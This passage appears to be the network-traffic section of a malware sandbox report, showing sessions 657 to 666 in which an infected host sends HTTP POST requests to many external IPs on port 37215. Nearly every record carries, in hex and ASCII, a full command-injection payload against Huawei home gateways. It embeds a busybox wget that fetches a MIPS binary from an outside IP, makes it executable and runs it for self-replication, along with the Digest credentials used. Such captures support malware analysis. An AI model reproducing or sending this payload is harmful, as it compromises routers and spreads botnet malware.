                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          657192.168.2.2345554157.186.105.14637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.215063095 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          658192.168.2.2338502197.216.230.1137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.215495110 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          659192.168.2.233910641.177.83.10137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.215540886 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          660192.168.2.233652645.141.59.3337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.215544939 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          661192.168.2.2334526119.249.197.24337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.215548038 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          662192.168.2.235815041.90.121.25137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.215642929 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          663192.168.2.235539041.39.106.21137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.215645075 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          664192.168.2.2357102157.187.11.22937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.215662003 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          665192.168.2.2346618197.11.197.4737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.215687037 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          666192.168.2.2356202157.144.141.2037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.215689898 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
